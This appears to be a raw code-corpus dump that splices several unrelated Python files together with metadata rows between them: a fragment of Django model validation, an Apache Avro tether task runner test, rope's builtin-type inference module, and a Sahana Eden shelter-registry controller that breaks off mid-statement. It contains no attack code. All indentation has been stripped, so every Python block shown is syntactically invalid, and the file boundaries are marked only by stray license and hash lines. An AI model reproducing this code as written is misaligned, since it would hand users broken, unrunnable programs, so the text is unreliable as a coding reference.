"%s, which has not been installed." % (f.name, f.rel.through)
)
signature = (f.rel.to, cls, f.rel.through)
if signature in seen_intermediary_signatures:
e.add(opts, "The model %s has two manually-defined m2m "
"relations through the model %s, which is not "
"permitted. Please consider using an extra field on "
"your intermediary model instead." % (
cls._meta.object_name,
f.rel.through._meta.object_name
)
)
else:
seen_intermediary_signatures.append(signature)
if not f.rel.through._meta.auto_created:
seen_related_fk, seen_this_fk = False, False
for field in f.rel.through._meta.fields:
if field.rel:
if not seen_related_fk and field.rel.to == f.rel.to:
seen_related_fk = True
elif field.rel.to == cls:
seen_this_fk = True
if not seen_related_fk or not seen_this_fk:
e.add(opts, "'%s' is a manually-defined m2m relation "
"through model %s, which does not have foreign keys "
"to %s and %s" % (f.name, f.rel.through._meta.object_name,
f.rel.to._meta.object_name, cls._meta.object_name)
)
elif isinstance(f.rel.through, basestring):
e.add(opts, "'%s' specifies an m2m relation through model %s, "
"which has not been installed" % (f.name, f.rel.through)
)
rel_opts = f.rel.to._meta
rel_name = RelatedObject(f.rel.to, cls, f).get_accessor_name()
rel_query_name = f.related_query_name()
# If rel_name is none, there is no reverse accessor (this only
# occurs for symmetrical m2m relations to self). If this is the
# case, there are no clashes to check for this field, as there are
# no reverse descriptors for this field.
if rel_name is not None:
for r in rel_opts.fields:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.local_many_to_many:
if r.name == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
if r.name == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.name, f.name))
for r in rel_opts.get_all_related_many_to_many_objects():
if r.field is not f:
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related m2m field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
for r in rel_opts.get_all_related_objects():
if r.get_accessor_name() == rel_name:
e.add(opts, "Accessor for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
if r.get_accessor_name() == rel_query_name:
e.add(opts, "Reverse query name for m2m field '%s' clashes with related field '%s.%s'. Add a related_name argument to the definition for '%s'." % (f.name, rel_opts.object_name, r.get_accessor_name(), f.name))
# Check ordering attribute.
if opts.ordering:
for field_name in opts.ordering:
if field_name == '?': continue
if field_name.startswith('-'):
field_name = field_name[1:]
if opts.order_with_respect_to and field_name == '_order':
continue
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
if '__' in field_name:
continue
# Skip ordering on pk. This is always a valid order_by field
# but is an alias and therefore won't be found by opts.get_field.
if field_name == 'pk':
continue
try:
opts.get_field(field_name, many_to_many=False)
except models.FieldDoesNotExist:
e.add(opts, '"ordering" refers to "%s", a field that doesn\'t exist.' % field_name)
# Check unique_together.
for ut in opts.unique_together:
for field_name in ut:
try:
f = opts.get_field(field_name, many_to_many=True)
except models.FieldDoesNotExist:
e.add(opts, '"unique_together" refers to %s, a field that doesn\'t exist. Check your syntax.' % field_name)
else:
if isinstance(f.rel, models.ManyToManyRel):
e.add(opts, '"unique_together" refers to %s. ManyToManyFields are not supported in unique_together.' % f.name)
if f not in opts.local_fields:
e.add(opts, '"unique_together" refers to %s. This is not in the same model as the unique_together statement.' % f.name)
return len(e.errors)
| bsd-3-clause | -2,841,106,535,951,618,000 | 63.435065 | 264 | 0.52207 | false |
apache/avro | lang/py/avro/test/test_tether_task_runner.py | 2 | 6739 | #!/usr/bin/env python3
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import logging
import os
import subprocess
import sys
import time
import unittest
import avro.io
import avro.test.mock_tether_parent
import avro.test.word_count_task
import avro.tether.tether_task
import avro.tether.tether_task_runner
import avro.tether.util
class TestTetherTaskRunner(unittest.TestCase):
"""unit test for a tethered task runner."""
def test1(self):
# set the logging level to debug so that debug messages are printed
logging.basicConfig(level=logging.DEBUG)
proc = None
try:
# launch the server in a separate process
parent_port = avro.tether.util.find_port()
pyfile = avro.test.mock_tether_parent.__file__
proc = subprocess.Popen([sys.executable, pyfile, "start_server", f"{parent_port}"])
input_port = avro.tether.util.find_port()
print(f"Mock server started process pid={proc.pid}")
# Possible race condition? open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
runner = avro.tether.tether_task_runner.TaskRunner(avro.test.word_count_task.WordCountTask())
runner.start(outputport=parent_port, join=False)
# Test sending various messages to the server and ensuring they are processed correctly
requestor = avro.tether.tether_task.HTTPRequestor(
"localhost",
runner.server.server_address[1],
avro.tether.tether_task.inputProtocol,
)
# TODO: We should validate that open worked by grabbing the STDOUT of the subproces
# and ensuring that it outputted the correct message.
# Test the mapper
requestor.request(
"configure",
{
"taskType": avro.tether.tether_task.TaskType.MAP,
"inSchema": str(runner.task.inschema),
"outSchema": str(runner.task.midschema),
},
)
# Serialize some data so we can send it to the input function
datum = "This is a line of text"
writer = io.BytesIO()
encoder = avro.io.BinaryEncoder(writer)
datum_writer = avro.io.DatumWriter(runner.task.inschema)
datum_writer.write(datum, encoder)
writer.seek(0)
data = writer.read()
# Call input to simulate calling map
requestor.request("input", {"data": data, "count": 1})
# Test the reducer
requestor.request(
"configure",
{
"taskType": avro.tether.tether_task.TaskType.REDUCE,
"inSchema": str(runner.task.midschema),
"outSchema": str(runner.task.outschema),
},
)
# Serialize some data so we can send it to the input function
datum = {"key": "word", "value": 2}
writer = io.BytesIO()
encoder = avro.io.BinaryEncoder(writer)
datum_writer = avro.io.DatumWriter(runner.task.midschema)
datum_writer.write(datum, encoder)
writer.seek(0)
data = writer.read()
# Call input to simulate calling reduce
requestor.request("input", {"data": data, "count": 1})
requestor.request("complete", {})
runner.task.ready_for_shutdown.wait()
runner.server.shutdown()
# time.sleep(2)
# runner.server.shutdown()
sthread = runner.sthread
# Possible race condition?
time.sleep(1)
# make sure the other thread terminated
self.assertFalse(sthread.is_alive())
# shutdown the logging
logging.shutdown()
finally:
# close the process
if not (proc is None):
proc.kill()
def test2(self):
"""
In this test we want to make sure that when we run "tether_task_runner.py"
as our main script everything works as expected. We do this by using subprocess to run it
in a separate thread.
"""
proc = None
runnerproc = None
try:
# launch the server in a separate process
parent_port = avro.tether.util.find_port()
pyfile = avro.test.mock_tether_parent.__file__
proc = subprocess.Popen([sys.executable, pyfile, "start_server", f"{parent_port}"])
# Possible race condition? when we start tether_task_runner it will call
# open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
# start the tether_task_runner in a separate process
runnerproc = subprocess.Popen(
[
sys.executable,
avro.tether.tether_task_runner.__file__,
"avro.test.word_count_task.WordCountTask",
],
env={"AVRO_TETHER_OUTPUT_PORT": f"{parent_port}", "PYTHONPATH": ":".join(sys.path)},
)
# possible race condition wait for the process to start
time.sleep(1)
print(f"Mock server started process pid={proc.pid}")
# Possible race condition? open tries to connect to the subprocess before the subprocess is fully started
# so we give the subprocess time to start up
time.sleep(1)
finally:
# close the process
if not (runnerproc is None):
runnerproc.kill()
if not (proc is None):
proc.kill()
if __name__ == ("__main__"): # pragma: no coverage
unittest.main()
| apache-2.0 | -497,161,027,172,772,400 | 34.845745 | 117 | 0.591779 | false |
muff1nman/Vim | vim/eclim/autoload/eclim/python/rope/base/builtins.py | 9 | 23636 | """This module trys to support builtin types and functions."""
import inspect
import rope.base.evaluate
from rope.base import pynames, pyobjects, arguments, utils
class BuiltinModule(pyobjects.AbstractModule):
def __init__(self, name, pycore=None, initial={}):
super(BuiltinModule, self).__init__()
self.name = name
self.pycore = pycore
self.initial = initial
parent = None
def get_attributes(self):
return self.attributes
def get_doc(self):
if self.module:
return self.module.__doc__
def get_name(self):
return self.name.split('.')[-1]
@property
@utils.saveit
def attributes(self):
result = _object_attributes(self.module, self)
result.update(self.initial)
if self.pycore is not None:
submodules = self.pycore._builtin_submodules(self.name)
for name, module in submodules.iteritems():
result[name] = rope.base.builtins.BuiltinName(module)
return result
@property
@utils.saveit
def module(self):
try:
result = __import__(self.name)
for token in self.name.split('.')[1:]:
result = getattr(result, token, None)
return result
except ImportError:
return
class _BuiltinElement(object):
def __init__(self, builtin, parent=None):
self.builtin = builtin
self._parent = parent
def get_doc(self):
if self.builtin:
return getattr(self.builtin, '__doc__', None)
def get_name(self):
if self.builtin:
return getattr(self.builtin, '__name__', None)
@property
def parent(self):
if self._parent is None:
return builtins
return self._parent
class BuiltinClass(_BuiltinElement, pyobjects.AbstractClass):
def __init__(self, builtin, attributes, parent=None):
_BuiltinElement.__init__(self, builtin, parent)
pyobjects.AbstractClass.__init__(self)
self.initial = attributes
@utils.saveit
def get_attributes(self):
result = _object_attributes(self.builtin, self)
result.update(self.initial)
return result
class BuiltinFunction(_BuiltinElement, pyobjects.AbstractFunction):
def __init__(self, returned=None, function=None, builtin=None,
argnames=[], parent=None):
_BuiltinElement.__init__(self, builtin, parent)
pyobjects.AbstractFunction.__init__(self)
self.argnames = argnames
self.returned = returned
self.function = function
def get_returned_object(self, args):
if self.function is not None:
return self.function(_CallContext(self.argnames, args))
else:
return self.returned
def get_param_names(self, special_args=True):
return self.argnames
class BuiltinUnknown(_BuiltinElement, pyobjects.PyObject):
def __init__(self, builtin):
super(BuiltinUnknown, self).__init__(pyobjects.get_unknown())
self.builtin = builtin
self.type = pyobjects.get_unknown()
@utils.saveit
def get_attributes(self):
return _object_attributes(self.builtin, self)
def _object_attributes(obj, parent):
attributes = {}
for name in dir(obj):
if name == 'None':
continue
child = getattr(obj, name)
pyobject = None
if inspect.isclass(child):
pyobject = BuiltinClass(child, {}, parent=parent)
elif inspect.isroutine(child):
pyobject = BuiltinFunction(builtin=child, parent=parent)
else:
pyobject = BuiltinUnknown(builtin=child)
attributes[name] = BuiltinName(pyobject)
return attributes
def _create_builtin_type_getter(cls):
def _get_builtin(*args):
if not hasattr(cls, '_generated'):
cls._generated = {}
if args not in cls._generated:
cls._generated[args] = cls(*args)
return cls._generated[args]
return _get_builtin
def _create_builtin_getter(cls):
type_getter = _create_builtin_type_getter(cls)
def _get_builtin(*args):
return pyobjects.PyObject(type_getter(*args))
return _get_builtin
class _CallContext(object):
def __init__(self, argnames, args):
self.argnames = argnames
self.args = args
def _get_scope_and_pyname(self, pyname):
if pyname is not None and isinstance(pyname, pynames.AssignedName):
pymodule, lineno = pyname.get_definition_location()
if pymodule is None:
return None, None
if lineno is None:
lineno = 1
scope = pymodule.get_scope().get_inner_scope_for_line(lineno)
name = None
while name is None and scope is not None:
for current in scope.get_names():
if scope[current] is pyname:
name = current
break
else:
scope = scope.parent
return scope, name
return None, None
def get_argument(self, name):
if self.args:
args = self.args.get_arguments(self.argnames)
return args[self.argnames.index(name)]
def get_pyname(self, name):
if self.args:
args = self.args.get_pynames(self.argnames)
if name in self.argnames:
return args[self.argnames.index(name)]
def get_arguments(self, argnames):
if self.args:
return self.args.get_arguments(argnames)
def get_pynames(self, argnames):
if self.args:
return self.args.get_pynames(argnames)
def get_per_name(self):
if self.args is None:
return None
pyname = self.args.get_instance_pyname()
scope, name = self._get_scope_and_pyname(pyname)
if name is not None:
pymodule = pyname.get_definition_location()[0]
return pymodule.pycore.object_info.get_per_name(scope, name)
return None
def save_per_name(self, value):
if self.args is None:
return None
pyname = self.args.get_instance_pyname()
scope, name = self._get_scope_and_pyname(pyname)
if name is not None:
pymodule = pyname.get_definition_location()[0]
pymodule.pycore.object_info.save_per_name(scope, name, value)
class _AttributeCollector(object):
def __init__(self, type):
self.attributes = {}
self.type = type
def __call__(self, name, returned=None, function=None,
argnames=['self'], check_existence=True):
try:
builtin = getattr(self.type, name)
except AttributeError:
if check_existence:
raise
builtin=None
self.attributes[name] = BuiltinName(
BuiltinFunction(returned=returned, function=function,
argnames=argnames, builtin=builtin))
def __setitem__(self, name, value):
self.attributes[name] = value
class List(BuiltinClass):
def __init__(self, holding=None):
self.holding = holding
collector = _AttributeCollector(list)
collector('__iter__', function=self._iterator_get)
collector('__new__', function=self._new_list)
# Adding methods
collector('append', function=self._list_add, argnames=['self', 'value'])
collector('__setitem__', function=self._list_add,
argnames=['self', 'index', 'value'])
collector('insert', function=self._list_add,
argnames=['self', 'index', 'value'])
collector('extend', function=self._self_set,
argnames=['self', 'iterable'])
# Getting methods
collector('__getitem__', function=self._list_get)
collector('pop', function=self._list_get)
collector('__getslice__', function=self._self_get)
super(List, self).__init__(list, collector.attributes)
def _new_list(self, args):
return _create_builtin(args, get_list)
def _list_add(self, context):
if self.holding is not None:
return
holding = context.get_argument('value')
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _self_set(self, context):
if self.holding is not None:
return
iterable = context.get_pyname('iterable')
holding = _infer_sequence_for_pyname(iterable)
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _list_get(self, context):
if self.holding is not None:
return self.holding
return context.get_per_name()
def _iterator_get(self, context):
return get_iterator(self._list_get(context))
def _self_get(self, context):
return get_list(self._list_get(context))
get_list = _create_builtin_getter(List)
get_list_type = _create_builtin_type_getter(List)
class Dict(BuiltinClass):
def __init__(self, keys=None, values=None):
self.keys = keys
self.values = values
item = get_tuple(self.keys, self.values)
collector = _AttributeCollector(dict)
collector('__new__', function=self._new_dict)
collector('__setitem__', function=self._dict_add)
collector('popitem', function=self._item_get)
collector('pop', function=self._value_get)
collector('get', function=self._key_get)
collector('keys', function=self._key_list)
collector('values', function=self._value_list)
collector('items', function=self._item_list)
collector('copy', function=self._self_get)
collector('__getitem__', function=self._value_get)
collector('__iter__', function=self._key_iter)
collector('update', function=self._self_set)
super(Dict, self).__init__(dict, collector.attributes)
def _new_dict(self, args):
def do_create(holding=None):
if holding is None:
return get_dict()
type = holding.get_type()
if isinstance(type, Tuple) and len(type.get_holding_objects()) == 2:
return get_dict(*type.get_holding_objects())
return _create_builtin(args, do_create)
def _dict_add(self, context):
if self.keys is not None:
return
key, value = context.get_arguments(['self', 'key', 'value'])[1:]
if key is not None and key != pyobjects.get_unknown():
context.save_per_name(get_tuple(key, value))
def _item_get(self, context):
if self.keys is not None:
return get_tuple(self.keys, self.values)
item = context.get_per_name()
if item is None or not isinstance(item.get_type(), Tuple):
return get_tuple(self.keys, self.values)
return item
def _value_get(self, context):
item = self._item_get(context).get_type()
return item.get_holding_objects()[1]
def _key_get(self, context):
item = self._item_get(context).get_type()
return item.get_holding_objects()[0]
def _value_list(self, context):
return get_list(self._value_get(context))
def _key_list(self, context):
return get_list(self._key_get(context))
def _item_list(self, context):
return get_list(self._item_get(context))
def _value_iter(self, context):
return get_iterator(self._value_get(context))
def _key_iter(self, context):
return get_iterator(self._key_get(context))
def _item_iter(self, context):
return get_iterator(self._item_get(context))
def _self_get(self, context):
item = self._item_get(context).get_type()
key, value = item.get_holding_objects()[:2]
return get_dict(key, value)
def _self_set(self, context):
if self.keys is not None:
return
new_dict = context.get_pynames(['self', 'd'])[1]
if new_dict and isinstance(new_dict.get_object().get_type(), Dict):
args = arguments.ObjectArguments([new_dict])
items = new_dict.get_object()['popitem'].\
get_object().get_returned_object(args)
context.save_per_name(items)
else:
holding = _infer_sequence_for_pyname(new_dict)
if holding is not None and isinstance(holding.get_type(), Tuple):
context.save_per_name(holding)
get_dict = _create_builtin_getter(Dict)
get_dict_type = _create_builtin_type_getter(Dict)
class Tuple(BuiltinClass):
def __init__(self, *objects):
self.objects = objects
first = None
if objects:
first = objects[0]
attributes = {
'__getitem__': BuiltinName(BuiltinFunction(first)),
'__getslice__': BuiltinName(BuiltinFunction(pyobjects.PyObject(self))),
'__new__': BuiltinName(BuiltinFunction(function=self._new_tuple)),
'__iter__': BuiltinName(BuiltinFunction(get_iterator(first)))}
super(Tuple, self).__init__(tuple, attributes)
def get_holding_objects(self):
return self.objects
def _new_tuple(self, args):
return _create_builtin(args, get_tuple)
get_tuple = _create_builtin_getter(Tuple)
get_tuple_type = _create_builtin_type_getter(Tuple)
class Set(BuiltinClass):
def __init__(self, holding=None):
self.holding = holding
collector = _AttributeCollector(set)
collector('__new__', function=self._new_set)
self_methods = ['copy', 'difference', 'intersection',
'symmetric_difference', 'union']
for method in self_methods:
collector(method, function=self._self_get)
collector('add', function=self._set_add)
collector('update', function=self._self_set)
collector('update', function=self._self_set)
collector('symmetric_difference_update', function=self._self_set)
collector('difference_update', function=self._self_set)
collector('pop', function=self._set_get)
collector('__iter__', function=self._iterator_get)
super(Set, self).__init__(set, collector.attributes)
def _new_set(self, args):
return _create_builtin(args, get_set)
def _set_add(self, context):
if self.holding is not None:
return
holding = context.get_arguments(['self', 'value'])[1]
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _self_set(self, context):
if self.holding is not None:
return
iterable = context.get_pyname('iterable')
holding = _infer_sequence_for_pyname(iterable)
if holding is not None and holding != pyobjects.get_unknown():
context.save_per_name(holding)
def _set_get(self, context):
if self.holding is not None:
return self.holding
return context.get_per_name()
def _iterator_get(self, context):
return get_iterator(self._set_get(context))
def _self_get(self, context):
return get_list(self._set_get(context))
get_set = _create_builtin_getter(Set)
get_set_type = _create_builtin_type_getter(Set)
class Str(BuiltinClass):
def __init__(self):
self_object = pyobjects.PyObject(self)
collector = _AttributeCollector(str)
collector('__iter__', get_iterator(self_object), check_existence=False)
self_methods = ['__getitem__', '__getslice__', 'capitalize', 'center',
'decode', 'encode', 'expandtabs', 'join', 'ljust',
'lower', 'lstrip', 'replace', 'rjust', 'rstrip', 'strip',
'swapcase', 'title', 'translate', 'upper', 'zfill']
for method in self_methods:
collector(method, self_object)
for method in ['rsplit', 'split', 'splitlines']:
collector(method, get_list(self_object))
super(Str, self).__init__(str, collector.attributes)
def get_doc(self):
return str.__doc__
get_str = _create_builtin_getter(Str)
get_str_type = _create_builtin_type_getter(Str)
class BuiltinName(pynames.PyName):
def __init__(self, pyobject):
self.pyobject = pyobject
def get_object(self):
return self.pyobject
def get_definition_location(self):
return (None, None)
class Iterator(pyobjects.AbstractClass):
def __init__(self, holding=None):
super(Iterator, self).__init__()
self.holding = holding
self.attributes = {
'next': BuiltinName(BuiltinFunction(self.holding)),
'__iter__': BuiltinName(BuiltinFunction(self))}
def get_attributes(self):
return self.attributes
def get_returned_object(self, args):
return self.holding
get_iterator = _create_builtin_getter(Iterator)
class Generator(pyobjects.AbstractClass):
def __init__(self, holding=None):
super(Generator, self).__init__()
self.holding = holding
self.attributes = {
'next': BuiltinName(BuiltinFunction(self.holding)),
'__iter__': BuiltinName(BuiltinFunction(get_iterator(self.holding))),
'close': BuiltinName(BuiltinFunction()),
'send': BuiltinName(BuiltinFunction()),
'throw': BuiltinName(BuiltinFunction())}
def get_attributes(self):
return self.attributes
def get_returned_object(self, args):
return self.holding
get_generator = _create_builtin_getter(Generator)
class File(BuiltinClass):
def __init__(self):
self_object = pyobjects.PyObject(self)
str_object = get_str()
str_list = get_list(get_str())
attributes = {}
def add(name, returned=None, function=None):
builtin = getattr(file, name, None)
attributes[name] = BuiltinName(
BuiltinFunction(returned=returned, function=function,
builtin=builtin))
add('__iter__', get_iterator(str_object))
for method in ['next', 'read', 'readline', 'readlines']:
add(method, str_list)
for method in ['close', 'flush', 'lineno', 'isatty', 'seek', 'tell',
'truncate', 'write', 'writelines']:
add(method)
super(File, self).__init__(file, attributes)
get_file = _create_builtin_getter(File)
get_file_type = _create_builtin_type_getter(File)
class Property(BuiltinClass):
def __init__(self, fget=None, fset=None, fdel=None, fdoc=None):
self._fget = fget
self._fdoc = fdoc
attributes = {
'fget': BuiltinName(BuiltinFunction()),
'fset': BuiltinName(pynames.UnboundName()),
'fdel': BuiltinName(pynames.UnboundName()),
'__new__': BuiltinName(BuiltinFunction(function=_property_function))}
super(Property, self).__init__(property, attributes)
def get_property_object(self, args):
if isinstance(self._fget, pyobjects.AbstractFunction):
return self._fget.get_returned_object(args)
def _property_function(args):
parameters = args.get_arguments(['fget', 'fset', 'fdel', 'fdoc'])
return pyobjects.PyObject(Property(parameters[0]))
class Lambda(pyobjects.AbstractFunction):
def __init__(self, node, scope):
super(Lambda, self).__init__()
self.node = node
self.scope = scope
def get_returned_object(self, args):
result = rope.base.evaluate.eval_node(self.scope, self.node.body)
if result is not None:
return result.get_object()
else:
return pyobjects.get_unknown()
def get_pattributes(self):
return {}
class BuiltinObject(BuiltinClass):
def __init__(self):
super(BuiltinObject, self).__init__(object, {})
class BuiltinType(BuiltinClass):
def __init__(self):
super(BuiltinType, self).__init__(type, {})
def _infer_sequence_for_pyname(pyname):
if pyname is None:
return None
seq = pyname.get_object()
args = arguments.ObjectArguments([pyname])
if '__iter__' in seq:
iter = seq['__iter__'].get_object().\
get_returned_object(args)
if iter is not None and 'next' in iter:
holding = iter['next'].get_object().\
get_returned_object(args)
return holding
def _create_builtin(args, creator):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
if holding is not None:
return creator(holding)
else:
return creator()
def _range_function(args):
return get_list()
def _reversed_function(args):
return _create_builtin(args, get_iterator)
def _sorted_function(args):
return _create_builtin(args, get_list)
def _super_function(args):
passed_class, passed_self = args.get_arguments(['type', 'self'])
if passed_self is None:
return passed_class
else:
#pyclass = passed_self.get_type()
pyclass = passed_class
if isinstance(pyclass, pyobjects.AbstractClass):
supers = pyclass.get_superclasses()
if supers:
return pyobjects.PyObject(supers[0])
return passed_self
def _zip_function(args):
args = args.get_pynames(['sequence'])
objects = []
for seq in args:
if seq is None:
holding = None
else:
holding = _infer_sequence_for_pyname(seq)
objects.append(holding)
tuple = get_tuple(*objects)
return get_list(tuple)
def _enumerate_function(args):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
tuple = get_tuple(None, holding)
return get_iterator(tuple)
def _iter_function(args):
passed = args.get_pynames(['sequence'])[0]
if passed is None:
holding = None
else:
holding = _infer_sequence_for_pyname(passed)
return get_iterator(holding)
def _input_function(args):
return get_str()
_initial_builtins = {
'list': BuiltinName(get_list_type()),
'dict': BuiltinName(get_dict_type()),
'tuple': BuiltinName(get_tuple_type()),
'set': BuiltinName(get_set_type()),
'str': BuiltinName(get_str_type()),
'file': BuiltinName(get_file_type()),
'open': BuiltinName(get_file_type()),
'unicode': BuiltinName(get_str_type()),
'range': BuiltinName(BuiltinFunction(function=_range_function, builtin=range)),
'reversed': BuiltinName(BuiltinFunction(function=_reversed_function, builtin=reversed)),
'sorted': BuiltinName(BuiltinFunction(function=_sorted_function, builtin=sorted)),
'super': BuiltinName(BuiltinFunction(function=_super_function, builtin=super)),
'property': BuiltinName(BuiltinFunction(function=_property_function, builtin=property)),
'zip': BuiltinName(BuiltinFunction(function=_zip_function, builtin=zip)),
'enumerate': BuiltinName(BuiltinFunction(function=_enumerate_function, builtin=enumerate)),
'object': BuiltinName(BuiltinObject()),
'type': BuiltinName(BuiltinType()),
'iter': BuiltinName(BuiltinFunction(function=_iter_function, builtin=iter)),
'raw_input': BuiltinName(BuiltinFunction(function=_input_function, builtin=raw_input)),
}
builtins = BuiltinModule('__builtin__', initial=_initial_builtins)
| mit | -8,516,747,661,055,037,000 | 31.467033 | 95 | 0.605475 | false |
flavour/cert | controllers/cr.py | 3 | 13875 | # -*- coding: utf-8 -*-
"""
Shelter Registry - Controllers
"""
# @ToDo Search shelters by type, services, location, available space
# @ToDo Tie in assessments from RAT and requests from RMS.
# @ToDo Associate persons with shelters (via presence loc == shelter loc?)
module = request.controller
resourcename = request.function
if module not in deployment_settings.modules:
raise HTTP(404, body="Module disabled: %s" % module)
# Load Models
s3mgr.load("cr_shelter")
# Options Menu (available in all Functions' Views)
s3_menu(module)
# S3 framework functions
# -----------------------------------------------------------------------------
def index():
""" Module's Home Page """
module_name = deployment_settings.modules[module].name_nice
response.title = module_name
return dict(module_name=module_name)
# =============================================================================
def shelter_type():
"""
RESTful CRUD controller
List / add shelter types (e.g. NGO-operated, Government evacuation center,
School, Hospital -- see Agasti opt_camp_type.)
"""
tabs = [(T("Basic Details"), None),
(s3.crud_strings["cr_shelter"].subtitle_list, "shelter")]
rheader = lambda r: response.s3.shelter_rheader(r,
tabs=tabs)
# @ToDo: Shelters per type display is broken -- always returns none.
output = s3_rest_controller(module, resourcename,
rheader=rheader)
return output
# -----------------------------------------------------------------------------
def shelter_service():
"""
RESTful CRUD controller
List / add shelter services (e.g. medical, housing, food, ...)
"""
tabs = [(T("Basic Details"), None),
(s3.crud_strings["cr_shelter"].subtitle_list, "shelter")]
rheader = lambda r: response.s3.shelter_rheader(r,
tabs=tabs)
output = s3_rest_controller(module, resourcename,
rheader=rheader)
return output
# =============================================================================
def shelter():
""" RESTful CRUD controller
>>> resource="shelter"
>>> from applications.sahana.modules.s3_test import WSGI_Test
>>> test=WSGI_Test(db)
>>> "200 OK" in test.getPage("/sahana/%s/%s" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/html")
>>> test.assertInBody("List Shelters")
>>> "200 OK" in test.getPage("/sahana/%s/%s/create" % (module,resource)) #doctest: +SKIP
True
>>> test.assertHeader("Content-Type", "text/html") #doctest: +SKIP
>>> test.assertInBody("Add Shelter") #doctest: +SKIP
>>> "200 OK" in test.getPage("/sahana/%s/%s?format=json" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/html")
>>> test.assertInBody("[")
>>> "200 OK" in test.getPage("/sahana/%s/%s?format=csv" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/csv")
"""
tablename = "cr_shelter"
table = db[tablename]
# Load Models to add tabs
if deployment_settings.has_module("inv"):
s3mgr.load("inv_inv_item")
elif deployment_settings.has_module("req"):
# (gets loaded by Inv if available)
s3mgr.load("req_req")
# Prepare the Presence table for use by Shelters
s3mgr.load("pr_presence")
field = db.pr_presence.shelter_id
field.requires = IS_NULL_OR(IS_ONE_OF(db, "cr_shelter.id",
"%(name)s",
sort=True))
field.represent = lambda id: \
(id and [db.cr_shelter[id].name] or ["None"])[0]
field.ondelete = "RESTRICT"
if deployment_settings.get_ui_camp():
HELP = T("The Camp this person is checking into.")
else:
HELP = T("The Shelter this person is checking into.")
ADD_SHELTER = response.s3.ADD_SHELTER
SHELTER_LABEL = response.s3.SHELTER_LABEL
field.comment = DIV(A(ADD_SHELTER,
_class="colorbox",
_href=URL(c="cr", f="shelter",
args="create",
vars=dict(format="popup")),
_target="top",
_title=ADD_SHELTER),
DIV( _class="tooltip",
_title="%s|%s" % (SHELTER_LABEL,
HELP)))
field.label = SHELTER_LABEL
field.readable = True
field.writable = True
# Make pr_presence.pe_id visible:
pe_id = db.pr_presence.pe_id
pe_id.readable = True
pe_id.writable = True
# Usually, the pe_id field is an invisible foreign key, therefore it
# has no default representation/requirements => need to add this here:
pe_id.label = T("Person/Group")
pe_id.represent = s3_pentity_represent
pe_id.requires = IS_ONE_OF(db, "pr_pentity.pe_id",
s3_pentity_represent,
filterby="instance_type",
orderby="instance_type",
filter_opts=("pr_person",
"pr_group"))
s3mgr.configure("pr_presence",
# presence not deletable in this view! (need to register a check-out
# for the same person instead):
deletable=False,
list_fields=["id",
"pe_id",
"datetime",
"presence_condition",
"proc_desc"
])
# Access from Shelters
s3mgr.model.add_component("pr_presence",
cr_shelter="shelter_id")
s3mgr.configure(tablename,
# Go to People check-in for this shelter after creation
create_next = URL(c="cr", f="shelter",
args=["[id]", "presence"]))
# Pre-processor
response.s3.prep = cr_shelter_prep
rheader = response.s3.shelter_rheader
output = s3_rest_controller(module, resourcename, rheader=rheader)
return output
# -----------------------------------------------------------------------------
def cr_shelter_prep(r):
"""
Pre-processor for the REST Controller
"""
if r.component and r.component.name == "presence":
r.resource.add_filter(db.pr_presence.closed == False)
if r.interactive:
if r.method != "read":
# Don't want to see in Create forms
# inc list_create (list_fields over-rides)
address_hide(r.table)
if r.component:
if r.component.name == "inv_item" or \
r.component.name == "recv" or \
r.component.name == "send":
# Filter out items which are already in this inventory
response.s3.inv_prep(r)
elif r.component.name == "human_resource":
# Filter out people which are already staff for this warehouse
s3_filter_staff(r)
# Cascade the organisation_id from the hospital to the staff
db.hrm_human_resource.organisation_id.default = r.record.organisation_id
db.hrm_human_resource.organisation_id.writable = False
elif r.component.name == "rat":
# Hide the Implied fields
db.assess_rat.location_id.writable = False
db.assess_rat.location_id.default = r.record.location_id
db.assess_rat.location_id.comment = ""
# Set defaults
if auth.is_logged_in():
query = (db.pr_person.uuid == session.auth.user.person_uuid) & \
(db.hrm_human_resource.person_id == db.pr_person.id)
staff_id = db(query).select(db.hrm_human_resource.id,
